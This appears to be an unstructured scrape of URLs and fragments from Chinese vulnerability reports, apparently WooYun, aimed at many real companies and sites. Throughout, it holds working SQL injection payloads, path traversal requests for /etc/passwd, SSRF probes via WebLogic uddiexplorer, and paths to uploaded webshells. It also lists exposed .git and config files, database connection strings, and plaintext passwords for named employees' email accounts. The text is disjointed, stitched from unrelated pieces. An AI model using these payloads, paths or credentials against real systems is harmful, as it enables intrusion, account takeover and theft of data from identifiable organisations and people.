http://**.**.**.**/share.php?F_email=admin@**.**.**.**%27and%20%28select%201%20from%20%20%28select%20count%28*%29,concat%28%28select%20md5%283.1415%29%29,floor%28rand%280%29*2%29%29x%20from%20mail.user%20group%20by%20x%29a%29%23 http://**.**.**.**/.NetConfiguration/v2.0 http://**.**.**.**/ http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two url:http://**.**.**.**/tools.php http://mail.alltrust.com.cn/,用人名拼音和弱口令123123可获得一个有效账号liuyy,登陆后会提示修改密码,已修改为admin@123,登陆后可查看内部邮件,查看工资信息,查看福建分公司通讯录,泄露内部信息。 http://www.wooyun.org/bugs/wooyun-2015-0144049/trace/9671b7d2bd0f918b35bfda17ac05a9b5 http://en.ramos.com.cn/news.php?class_id=4 http://drops.wooyun.org/tools/4760 http://en.ramos.com.cn/news.php?class_id=4 https://119.145.14.30 www.joboto.com http://svn.sdust.edu.cn/ http://**.**.**.**/mjlmc.html http://**.**.**.**/ecspms/login.aspx(生产安全管理系统) android:name="com.jsmcc.ui.desktop.FloatWindowService android:name="com.jsmcc.ui.desktop.FloatWindowService android:name="com.ecmc.service.MessageService android:name="com.ecmc.service.MessageService url:mail.lvmama.com www.airkunming.com http://**.**.**.**/console http://**.**.**.**/cK/foot.jsp http://**.**.**.**/cK/foot.jsp http://**.**.**.** www.yejs.com.cn/yjll/article/id/52071.htm www.yejs.com.cn/yjll/article/id/52071 www.yejs.com.cn/yjll/article/id/52071 ftp://61.129.93.146 http://www.yxb.com/ http://www.e8088.com/user/product/chost/chostBuyAction!chostInfo.action?productId=ch2014062500009&idcId=30 http://**.**.**.**/PowerMatter.aspx?BMID=4 http://**.**.**.**/newsdetail.asp?id=1 http://bd.skymoons.com/ http://**.**.**.**/admin/ http://**.**.**.**/article_list.php?id=0 http://**.**.**.**/article_view.php?id=182 http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml%3f&pn=0&subid=142 http://www.anshengcredit.com/about.php?id=35 http://www.anshengcredit.com/about.php?id=35 http://www.anshengcredit.com/about.php?id=35 url:http://203.161.4.58:8001,开启webdav扩展,目录可写,导致可getshell http://bj.gtja.com/bjhcg/shequ/main.asp http://bj.gtja.com/bjhcg/shequ/loginCheck.asp http://www.unibankmedia.com/system/login/loginforfile.jsp http://med.39.net:80/Information/DailyTip.aspx?qId=2342&v=135791&t=0&sQId=1418 http://202.104.30.215 http://blog.9666.cn/weblog/toEditWeblog.action?weblogId=2274992 http://**.**.**.**/Login.aspx http://www.qhdhr.com.cn/about.php?id=1 http://**.**.**.**/bugs/wooyun-2015-0143242 http://**.**.**.**/bugs/wooyun-2015-0143335 Email:zhangjingze@36kr.com www.1000new.com http://www.myjiangjun.com/ http://211.151.123.214/ http://oa.suntime2003.com/ http://58.68.237.248:8080/ http://58.68.237.248:8080/oss/code/config.ini http://refindex.csp.kuxun.cn/.git/config http://wechat.edaijia.cn/driverapi/sendSms.do&mobile=13012345678&serviceId=driver-wechat&sig=4a292bce798d79f22aceb10b0419bf98 http://h5.edaijia.cn http://**.**.**.**/examples/servlets/servlet/SessionExample http://www.class.cn/user/user_detail/?user_id=6284123 http://yuyin.baidu.com/bbs/question/newest http://www.wooyun.org/bugs/wooyun-2010-0104052 http://**.**.**/profile.phpspace_uid=218462633_ http://blog.chinaunix.net/xmlrpc.php?r=blog/index&uid=23100982 http://blog.chinaunix.net/site/expert.html这里找的 http://blog.chinaunix.net/uid/23458341.html http://blog.chinaunix.net/xmlrpc.php?r=blog/index&uid=23458341 http://treistertest.chanjet.com/card.aspx?RJMF=&UFIN=1 http://zx.39.net:80/anli/getdata.ashx?act=getaskarticlelist&label=双眼皮手术 http://oa.airchinapm.com:2001/yyoa/index.jsp http://m.zyql.cn/?m=android/scenic.scenicTypelist&scenicType=1 http://m.zyql.cn/?m=android/scenic.scenicZb&cityId= X-Frame-Options:DENY http://www.fusionskye.com/anli.php?pid=1%27 http://www.fusionskye.com/product_x.php?id=87%27 http://www.fusionskye.com/about_l.php?id=27%27 http://wooyun.org/bugs/wooyun-2015-0145328 http://mmlogdgw.ckmnjvk.bbsj.pw/view/2/?id=29,0.0736658 http://**.**.**.**/) http://opweb.youcai.ele.me http://opweb.youcai.ele.me/eleme.min-d00caa4cd6.js http://182.92.234.85/ http://emarketing.sina.com.cn/voice.php?t=3%20AND%203*2*1%3d6%20AND%20701%3d701 http://**.**.**.**/login.aspx https://**.**.**.** http://myaquila.stjohns.hk/ http://myaquila.stjohns.hk/uc_server IP:http://180.169.51.84/index.php?s=/Index/login.shtml http://180.169.51.166/nswebui.html http://benyouhui.it168.com貌似是个论坛,右上角登录接口,一开始发现登录是有限制的 http://**.**.**.**/view/list?type=notice http://**.**.**.**/login.jsp http://**.**.**.**/nchwhs/login.jsp http://home.tvos.skysrt.com/ http://home.tvos.skysrt.com:8086/ http://home.tvos.skysrt.com:8088/ http://60.247.79.29/ http://www.class.cn/course/course_detail2/?course_id=101683 http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=couponlist http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=createcoupon http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10555 http://**.**.**.**/templates/ahlibs/jsp/hbsx3nav.jsp?id=1523&webcode=/ahlibs http://act.midea.com/jdprize/site/CI4/v2.php http://act.midea.com/jdprize/site/CI3/index.php/commiter/C_commiter/getList https://github.com/SimonLeaves/xmyeTest/blob/098a1c143cb32ba968d95460deb3cdb80a59ca32/xmyeTest/src/main/resource/web.properties jdbc:mysql://127.0.0.1:3306/eby_test?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://ebaoyangdev.mysql.rds.aliyuncs.com:3306/eby_stat?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true http://ebaoyang.cn/front/report/report?id=387【e保养】 http://ebaoyang.cn/front/report/report?id=3000 http://ebaoyang.cn/front/report/report?id=1234 http://ebaoyang.cn/front/report/report?id=1232 http://c.ebaoyang.cn/c/login?callback=/c/console/promt/my http://manage.ezucoo.com/erc/login.action http://passport.pptv.com/UI/Security/MiniLogin.aspx这个接口了,无验证码,无限制,用户名密码均明文传输,可以fuzzing http://**.**.**.**/config.php~ http://**.**.**.**/index.jsp http://**.**.**.** http://wooyun.org/bugs/wooyun-2015-0144505 http://m.zyql.cn/?m=android/order.scenicBook&id=64&tid=115,未过滤 http://**.**.**.**/List.aspx?id=468683857360 http://**.**.**.**/content.aspx?id=631933770236 www.winadd.cn http://www.winadd.cn http://**.**.**.**:8012/login.aspx http://**.**.**.**:8012 chuang.yicai.com/project?project_id=-1 https://github.com/shaovie/heracles/blob/f5fa8e5a1eab51ec76438dbd9656f27a0d9209db/tmp/sendmail.py#L103 https://www.rmbbox.com/login http://www.mech.hku.hk/index.php?tpl=page&id=3 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://www.mech.hku.hk/index.php?tpl=people&cid=1 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://www.mech.hku.hk/index.php?tpl=news&cid=1 http://**.**.**.**:7001/console/login/LoginForm.jsp http://spm.sugon.com/ http://wooyun.org/bugs/wooyun-2015-0109682的续集 http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/ http://**.**.**.**/chi/project/project_mb.php?id=-1 http://**.**.**.**/houtai_admin/login.jsp http://**.**.**.**/wap/category.php?cat_id=16 http://**.**.**.**/index.php?r=archives/research/new&id=6802&t=1443190140 http://**.**.**.**/index.php?r=member/default/content&id=5531&t=1441623678网盘信息页面 http://**.**.**.**/login.asp http://duyun.loupan.com/index.php?apartments=0&area=628&c=house&decorate=1&existing=0&feature=829&keywords=e&m=get_house_combox_list&page=2&price=0-2000&property=7&state=5&subway=0 intitle:Acenter http://**.**.**.**/ http://**.**.**.**/ http://1 http://114.215.194.8:8080/fridge/login_loginAction.action http://120.204.232.131:8089/GetUnit.aspx?RmtpId=0001&service=api_getUnitRmtp&UnitId=0001 http://sqlmap.org http://eip.crcchem.com/page/element/news/more.jsp?eid=4721 http://eip.crcchem.com/page/element/news/more.jsp?eid=4721 http://**.**.**.**/sz_class.asp?id=1 http://**.**.**.**/sx_class.asp?id=1 http://**.**.**.**/other.asp?id=1 ttp://**.**.**.**/news.asp?id=395 http://**.**.**.**/kc_class.asp?id=3 http://**.**.**.**/class.asp?id=51 http://union.51.com http://union.51.com http://career.crc.com.cn http://career.crc.com.cn/hrjob/front/getImgSrc.do?filename=/app/upload/hrjob/temp/1444359198577.jpg http://career.crc.com.cn/hrjob/front/download.do?filePath=/app/upload/hrjob/photo/9513920151009110437666.jspx&fileName=one.jspx http://career.crc.com.cn/hrjob/getDownloadFile_resumesearch.do?filePath=/etc/passwd&fileName=passwd http://**.**.**/ http://shop.homeinns.com http://shop.homeinns.com/member/MyAddress/Manage/42713?OpType=Edit https://121.15.129.252/resin-admin/index.php http://**.**.**.**/axis2/ https://**.**.**.**/login admin:axis2 wsdl:definitions xmlns:wsdl="http://**.**.**.**/wsdl/ xmlns:ns1="http://org.apache.axis2/xsd xmlns:ns="http://**.**.**.** xmlns:ax27="http://**.**.**.**/xsd xmlns:wsaw="http://**.**.**.**/2006/05/addressing/wsdl xmlns:ax25="http://**.**.**.**/xsd xmlns:http="http://**.**.**.**/wsdl/http/ xmlns:xs="http://**.**.**.**/2001/XMLSchema xmlns:mime="http://**.**.**.**/wsdl/mime/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:soap12="http://**.**.**.**/wsdl/soap12/ http://**.**.**.** wsdl:documentation wsdl:documentation wsdl:types xs:schema http://**.**.**.**/xsd xs:complexType xs:sequence xs:complexType xs:schema xs:schema http://**.**.**.**/xsd xs:complexType xs:sequence xs:element xs:string"/ xs:element xs:string"/ xs:element xs:string"/ xs:element xs:float"/ xs:element xs:string"/ xs:sequence xs:complexType xs:schema xs:schema xmlns:ax28="http://**.**.**.**/xsd xmlns:ax26="http://**.**.**.**/xsd http://**.**.**.** xs:import http://**.**.**.**/xsd"/ xs:import http://**.**.**.**/xsd"/ xs:element xs:complexType xs:sequence http:address http://**.**.**.**/axis2/services/MonitiseServices.MonitiseServicesHttpEndpoint/"/ wsdl:port wsdl:service wsdl:definitions http://www.yeehang.cc/main.aspx#我们打开发现是一个oa系统 http://**.**.**.**/wp-config.php~ http://**.**.**.**/wp-config.php~ http://**.**.**.**/Editing_wp-config.php http://ebooking.lvmama.com/ http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=83902&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=81900&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/super_order/hotel/orderck.do?ebkTaskId=81100&actionType=select http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619365 http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619364 http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619363 http://www.xadai.com/UF/Uploads/MemberData/ http://**.**.**.**:8080/opac_two/detail?code=1256&name=%E5%B7%A5%E7%A8%8B%E7%AE%A1%E7%90%86 http://**.**.**.**:8080/opac_two/detail?code=030106&name=%E8%AF%89%E8%AE%BC%E6%B3%95%E5%AD%A6 https://github.com/allen0115/mybatis-generator-maven/blob/b2c5439f38fb8cd524814c943e339f70746273e3/target/classes/META-INF/maven/nfd/mg/pom.xml ysql://112.74.197.103:3***** http://bbs.wxrb.com/vote/index.php?a=list&voteid=4 http://www.eleweike.com/index.php?a=news&tid=1 http://**.**.**.**/government/ http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/mainSkool/mainSkool.php http://job.51.com http://job.51.com/sz/search?key=e&new=1 http://jbk.39.net/phpmyadmin/main.php http://m.zhinanmao.com/tripapi/order?order_id=2532 http://click.99.com/static.php?channel=20016&web_id=2303663&kind=1 http://**.**.**.**/xmxx.asp?id=193 http://**.**.**.**/xmxx.asp?id=193 http://**.**.**.** http://www.cf40.org.cn/jinrong/zhuanti.php?id=10044 http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp http://rdscm.midea.com.cn:7008//uddiexplorer/SetupUDDIExplorer.jsp http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.142:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.142:24&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://rdscm.midea.com.cn:7008//uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.1:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/index.php?rSite/Index&sysPageId=141202171042413 http://**.**.**.**/upload/download.php?id=123 http://www.24gtd.com/ http://www.600373.net/mainpages/vedio.aspx?LessType=MD102 http://**.**.**.**/download.jsp?filename=../../../../../../../etc/passwd http://**.**.**.**/bugs/wooyun-2015-0144084 http://dz.loupan.com/ index.php/house/ajax_set_support/?s=0.025794034590944648 http://dz.loupan.com URL:http://report.brandwisdom.cn/phpinfo.php URL:http://wap.brandwisdom.cn/log.txt http://42.62.67.17:8080/.git/config http://hc.brandwisdom.cn/.git/config http://hotel.brandwisdom.cn/.git/config http://report.brandwisdom.cn/.git/config http://www.brandwisdom.cn/.git/config http://www.freebuf.com/tools/66096.html http://cio.zdnet.com.cn/ http://**.**.**.**/bugs/wooyun-2015-0136712进行测试发现的。 http://**.**.**.** http://bbs.ejiayu.com/uc_server/admin.php http://**.**.**.** https://**.**.**.**/idp/Authn/UserPassword http://open.lianwifi.com/ http://**.**.**.**:80/cms/columncount.jsp?urls=http://**.**.**.**/ http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f'and http://**.**.**.**/Web_XXXX.aspx?InfoID=3e56f6f0-e777-4ff1-bfaf-d691c8f1ab9f'and www.redflag-linux.com http://**.**.**.** http://**.**.**.**/st/login.aspx http://**.**.**/ http://218.28.234.62:8080/index.aspx http://218.28.234.62:8080/index.aspx http://123.15.56.100:8080/Index.aspx http://123.15.56.100:8080/Index.aspx http://**.**.**.**/liulc/kgwz/manager/login.asp http://**.**.**.**/liulc/kgwz/xxzx_view.asp?id=1564 http://gxzyy.91huayi.com/Login/Login.aspx com:7890/easoa/login/kingdee_sso_auth.jsp com:7890 http://ploy.infobird.com:8080/ploy/code/config.ini http://ploy.infobird.com/ http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A http://**.**.**.**/about/news/news_view.php?id=273 http://**.**.**.**/bugs/wooyun-2010-0144999 http://**.**.**.**/ http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891 http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891 http://**.**.**.** http://**.**.**.**/server/tsg/lib_ml.asp Data:txtUser=1&txtPass=1 Data:B2=%EF%BF%BD%EF%BF%BD%D1%AF&txtName=1 http://tj.g.pptv.com/click.php?t=reurl&gid=qfz&sid=7&cid=4&ccid=18&url=http://baidu.com http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 http://www.piaozhijia.cn/feedback/queryFeedbackList www.piaozhijia.cn http://**.**.**.**/NewsCategory.aspx?strClass=%E6%96%B0%E9%97%BB%E5%BF%AB%E8%AE%AF http://**.**.**.**:8808/ewebeditor/admin/default.asp http://**.**.**.**/jyga/ewebeditor/admin/default.asp http://**.**.**.**/wysga/AMHtmlEditor/admin/default.asp http://**.**.**.**/AMHtmlEditor/admin/default.asp http://**.**.**.**/AMHtmlEditor/admin/default.asp http://**.**.**.**:73/AMHtmlEditor/admin/default.asp http://**.**.**.**/ewebeditor/admin/default.asp http://**.**.**.**/jyga/ http://**.**.**.**/jyga/AMHtmlEditor/admin/default.asp http://**.**.**.**/jyga/ewebeditor/admin/default.asp http://**.**.**.**/jyga/AMHtmlEditor/db/ewebeditor.mdb http://**.**.**.**/jyga/ewebeditor/db/ewebeditor.mdb http://**.**.**.**/jyga/AMHtmlEditor/admin/upload.asp?id=8&d_viewmode=&dir=../ http://**.**.**.**/jyga/ewebeditor/uploadfile/201510/20151009151521893.asp http://scan.safe.baidu.com/.svn/entries http://image.meilele.com/images/201510/1444397806464.php http://image.meilele.com/images/201510/1444397828700.html http://weblogic:7001/cuss/index.jsp http://域名/Tur.php?hid= http://**.**.**.**/tur.php?hid=24 http://**.**.**.**/Tur.php?hid=1 http://www.atax.biz/Tur.php?hid=1 http://www.xohxoh.biz/tur.php?hid=6 http://**.**.**.**/new/mtv/tur.php?hid=1 http://**.**.**.**/tur.php?hid=1 http://**.**.**.**/Tur.php?hid=1 http://**.**.**.**/tur.php?hid=24 http://**.**.**.**/sousou.aspx?title=123 http://**.**.**.**/sousou.aspx?title=123 http://**.**.**.** http://yinyue.kuwo.cn http://oa.fosun.com/ http://www.xxoo.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/news_more.asp?bigclassid=80&articleid=5334 http://**.**.**.**/news_more.asp?bigclassid=123&articleid=6814 http://**.**.**.**/news_more.asp?bigclassid=88&articleid=926 http://**.**.**.**/news_more.asp?bigclassid=111&articleid=4218 http://**.**.**.**/news_more.asp?bigclassid=108&articleid=4791 http://**.**.**.**/news_more.asp?bigclassid=81&articleid=1114 http://**.**.**.**/news_more.asp?bigclassid=88&articleid=965 http://**.**.**.**/news_more.asp?bigclassid=74&articleid=2879 http://**.**.**.**/news_more.asp?bigclassid=74&articleid=2173 http://**.**.**.**/news_more.asp?bigclassid=61&articleid=4882 http://**.**.**.**/news_more.asp?bigclassid=74&articleid=1756 http://**.**.**.**/bugs/wooyun-2010-0132010 http://bbs.2345.cn/ http://confluence.**.**.**.**/ http://confluence.**.**.**.**/pages/viewpage.action?pageId=2162706&src=search http://confluence.**.**.**.**/pages/viewpage.action?pageId=5966667 http://community.apicloud.com/bbs.zip http://m.baidu.com/ http://**.**.**.**/ www.R**.**.**.** http://localhost/index.php?s=/Home/cancel/index http://220.194.29.181/seigys/logonAction.do,如图所示: http://220.194.29.181/seigys/logonAction.do http://**.**.**.**/ http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/LM/login/login.jsp http://**.**.**.**:7002/LM/pages/ydcx/index.jsp http://**.**.**/ http://**.**.**.**:8001/cK/foot.jsp http://**.**.**.**/newsPage.php?big=2&nt=17&ns=4691 http://**.**.**.**:9090/CMADoc/apply_userapply.action?userid=存在命令执行漏洞 www.geely.com http://www.glbpay.com/ http://uatwechat.pkufi.com/pkufi_uat/ http://kh.infobird.com/login http://mobile.chinaiiss.com/strategy/v3/news/get_newsinfo?newsid=50483 Id:0;368625 Package:NTLM User:Administrator Domain:WIN-7NPQ8AEVO1F Id:0;996 Package:Negotiate User:WIN-7NPQ8AEVO1F$ Domain:WORKGROUP Id:0;997 Package:Negotiate User:LOCAL Id:0;213869 Package:NTLM http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/Educational/dk_RegUser.aspx http://study.**.**.**.** http://**.**.**.**/Content.aspx?id=119234181908 http://**.**.**.**/ewebeditor/admin/login.aspx http://**.**.**.**/service/news_details.php?pkey=1749 http://**.**.**.**/service/news_details.php?pkey=1749 http://**.**.**.**/s/ir_alerts.php http://**.**.**.**/hk/alert_loggedin.php?clientid=810,看来克莉丝汀客户号是810。 http://**.**.**.**/html/index.php?clientid=810 http://**.**.**.**/works_type.php?u=7 http://xing.cada.cn:20052/Login/Index http://**.**.**.**/display02/center.asp?organizeID=73 http://**.**.**.**/display02/center.asp?organizeID=73 http://**.**.**.**/display02/sandyLogin.asp http://**.**.**.**/ListIndex.asp?OneId=1 http://**.**.**.**/admin/Login.asp http://**.**.**.**/bugs/wooyun-2015-0135332 http://**.**.**.**:8080/manage/upload/upload.html http://**.**.**.**:8080/manage/upload/lyzx_image.jsp http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2014-080193 www.***.com/Article/ www.***.com/Article/admin.asp http://e.faw-vw.com/ http://e.faw-vw.com Injection:http://**.**.**.**/2013/zj/storyitem.php?id=1408 http://m.faw-vw.com/autoparts/show?car=7002&keyword=1 https://www.creditwe.com/htmlreg.do http://**.**.**.**/whitehats/%E6%9C%AB%E7%AC%94%E4%B8%B6) http://**.**.**.**/bugs/wooyun-2010-068088 http://**.**.**.**/pg/newpage/login.aspx http://**.**.**.**/pg/newpage/login.aspx http://**.**.**.**/NewPage/Login.aspx http://**.**.**.**/NewPage/Login.aspx http://**.**.**.**:8300/NewPage/Login.aspx http://**.**.**.**/NewPage/loginSso.aspx?ReturnUrl=%2fDefault.aspx http://218.56.138.156:8080/web/manager/ http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456 http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321 http://**.**.**.**:8080/ http://**.**.**.**/share/home?uk=1849117482&view=share#category/type=0 http://**.**.**.**/s/1dDChn4t http://www.siti.com.cn/hr.php?act=search&fid=42&fup=8 http://www.airjiatu.com/admin/login/login.php http://**.**.**.**/ http://www.dongfeng-honda.com/honda_mediaReport.php?nid=-1+OR+17-7%3d10 http://weixin.union.appchina.com/index.php?s=/Home/User/login.html http://www.zte-v.com.cn/robots.txt http://**.**.**.**/ViewBuildChart.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuildChart.aspx?ldid=@@version http://**.**.**.**:8000/ViewBuildChart.aspx?ldid=@@version https://m.nongfadai.com/checkUser.html http://218.93.120.202:89/manager/login.do http://www.61.com/v1/ https://github.com/handong106324/sqLogWeb/blob/e4b3815ecbbb1714386ca8d60640f3809dfffa20/WebRoot/WEB-INF/classes/mail_config_zh_CN.properties jdbc:mysql://124.248.40.5:3306/wh_log jdbc:mysql://10.100.151.93:58306/wahu_operation jdbc:mysql://117.121.22.23:30031/wh_log jdbc:mysql://127.0.0.1:3306/wh_log MSG_SERVER_IP:117.121.17.11 MSG_SERVER_IP:10.20.41.86 MSG_SERVER_IP:210.242.234.86 HAIWAIFLAG:true isByKey:true HANGUO_WH:false INTERNATIONAL_NEED:true https://github.com/search?p=2&q=zhuwenxuan%40baidu.com++username&ref=searchresults&type=Code&utf8=%E2%9C%93 https://email.baidu.com https://mytoken.baidu.com/mytoken.jsp http://**.**.**.**/tc/self_guided_tour_detail.php?id=20 http://**.**.**.**/cms/ http://**.**.**.**/images/Icon/conf1.php https://github.com/ouyx/ordersys3/blob/98809b64f3e3b1d8318c695ea0f346e0d54d0f4f/application/libraries/mailer.php http://**.**.**.**/index.aspx http://u.ctrip.com/union/sitemanage/ChangeHeaderFooter_NewByDistribution.aspx http://**.**.**.**:8088/HDQYTX/qiyeyhxx/qiyeyhxx!yonghu_zhuce.action存在命令执行漏洞 http://**.**.**.**:8888/config/pstarUser.aspx http://**.**.**.**:10088/config/pstarUser.aspx http://info.himin.com http://info.himin.com/messageAction!toSubSug.action http://api.joyoung.com:8089/ia/appfiles/2015/06/30/f66c88cd3d804f75b4ad9a191763fbe6.bin(该地址已经失效) http://m.iiyi.com/fk/ http://www.yp900.com/Admin_Buy/getAdInfo.ashx?areaid=8&classid=23&random= http://**.**.**.**/jyjb/downview.jsp?id=3046 http://**.**.**.**/party/zxzx/index.jsp?id=47561 http://**.**.**.**/zxzx/list.jsp?order= http://**.**.**.**/zyjs/ejz.jsp?id=060000 http://**.**.**.**/zxzx/jump.jsp?id=47477 http://**.**.**.**/newview/result.jsp http://**.**.**.**/Account/LogOn http://**.**.**.**/bugs/wooyun-2010-0134095 http://mallcoo.cn/aboutus.html http://mallcoo.cn/ http://42.120.7.150:17000/ https://42.120.7.150/svn/ http://d.mallcoo.cn http://d.mallcoo.cn:8980/index.php http://**.**.**.**/uppic/3431211201011469_2.gif http://**.**.**.**/admin/ercblogin.asp http://webmail.tcl.com http://magazine.tcl.com/ http://magazine.tcl.com/Default.aspx http://magazine.tcl.com http://oa.hupu.com:88/seeyon/management/index.jsp bbs.hupu.com/U1kxcUs4Z0gySg.php https://tower.im/ http://58.56.225.218:8080/hmweb/docs/login.jsp http://58.56.225.218:8080/hmweb/login.action http://58.56.225.218:8080/hmweb/login.action http://mail2011.steelhome.cn/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://www.dfzt.com.cn/上海东方证券资本投资有限公司系东方证券股份有限公司专业直接投资机构。 http://www.dfzt.com.cn/i5808/,随便一试admin:admin成功进入 http://www.cits.cn/marketing/APP/2wm/index.html http://**.**.**.**/getSpxx.action?flid=1903&page=2 http://**.**.**.**:8080/icarttw/getSpxx.action?flid=1884&page=1&type=3&flmc=U%E7%9B%98 http://**.**.**.**:8090/getSpxx.action?flid=1665&page=1&type=4 www.familymart.com.cn右上角进入集享卡: http://125.67.64.82:8081 http://125.67.64.82:8081 http://www.uxin.com/ http://**.**.**.**、http://**.**.**.**,IP分别为:**.**.**.** http://**.**.**.**/book/dzbook_list.php?bcate=sk&cid=17 http://www.dfpv.com.cn/fs/pressroom_retrieve/1444378873.html http://**.**.**.**/ mail:wanghong@renrenche.com----renrenche@123 mail:zhangtingting@renrenche.com----renrenche@123 mail:wanglu@renrenche.com----renrenche@123 http://p-rrc.ccic2.com/app/login.jsp http://hr.himin.net/ http://www.wandoujia.com/apps/com.nongfadai.android http://**.**.**.**/sys/Article/case/ http://**.**.**.**/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/OA//goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/dsoa_xhwj/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://**.**.**.**/DSOA_TY/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/DSOA_TY/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/OA/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/dsoa_xhwj/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1 http://**.**.**.**/data/AjaxService.aspx?method=selectypml&pageSize=10&pageIndex=1&n= http://rb.tcl.com/admin http://rb.tcl.com/upload/image/201510/36ba2604-feb6-4e22-ab8c-3b24e414affa.jspx http://**.**.**.**/mtait/login.jsp http://**.**.**.**/mtait/dataCollection/dataCollectionQuery!input.do encap:Ethernet B8:CA:3A:6A:A9:74 baca:3aff:fe6a:a974/64 Scope:Link MTU:1500 packets:273706886 packets:717697366 txqueuelen:1000 http://jira.25pp.com/ http://kf.touzhu.cn/Web/ScoreHis.aspx http://**.**.**.**/lnmp/lnmp1.2.tar.gz http://116.255.245.4/ http://116.255.245.4/First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE= http://**.**.**.**/bugs/wooyun-2010-098403 http://**.**.**.**/admin http://**.**.**.**/upload/image/201510/36ba2604-feb6-4e22-ab8c-3b24e414affa.jspx http://**.**.**.**/bugs/wooyun-2010-0103604 www.class.cn http://wooyun.org/bugs/wooyun-2015-0128244 http://enterprisehw.com/showlocalnews.php?id=441 http://**.**.**.**:9001/qdweb/realweb/index.jsp http://**.**.**.**:8001/czhouse/Login.jsp http://**.**.**.**:9001/console/login/LoginForm.jsp http://**.**.**.**/Core/Skin/Login.aspx http://**.**.**.**/login.aspx user:A0008 PASS:207106 http://**.**.**.**//uploadfiles/201510/1.aspx http://**.**.**.**/ http://**.**.**.**/bocadmin/ http://**.**.**.** http://**.**.**.** http://222.174.54.118:8088 http://222.174.54.118:8088/office.aspx http://222.174.54.118:8088/office.aspx?code=CC&name=%E9%95%BF%E6%98%A5%E5%88%86%E5%85%AC%E5%8F%B8 http://222.174.54.118:8088/office.aspx http://hanbanoa.open.com.cn http://mobile.chinaiiss.com/strategy/v3/user/login https://**.**.**.**/visa188/visa/blob/c54cd3e8ffa879176d5112cebad937b05cc9c8d2/src/main/resources/conf/jdbc.properties jdbc:mysql**.**.**.**:3306/visa?useUnicode=true&autoReconnect=true&characterEncoding=UTF-8 jdbc:mysql**.**.**.**:3306/visa?useUnicode=true&autoReconnect=true&characterEncoding=UTF-8 bdbrowser://newtab域中,有个常用网址功能,但是没有对title进行有效处理,导致XSS。设置常用网址,只需要给用户一个网址,发现只要在页面中设置js多reload几次就能自动存留在这个popup http://127.0.0.1/browser/test.js http://**.**.**.** http://**.**.**.**:9000/index_jzytj.jsp http://**.**.**.**:9000/i/oem/grpslogin.jsp http://**.**.**.**:9000/console/login/LoginForm.jsp http://**.**.**.**/bugs/wooyun-2010-0113172 http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**:7003/console/login/LoginForm.jsp http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm http://**.**.**.**/login.aspx http://**.**.**.**/login.aspx jimmy:00000000 LO:drwclo http://**.**.**.**/ 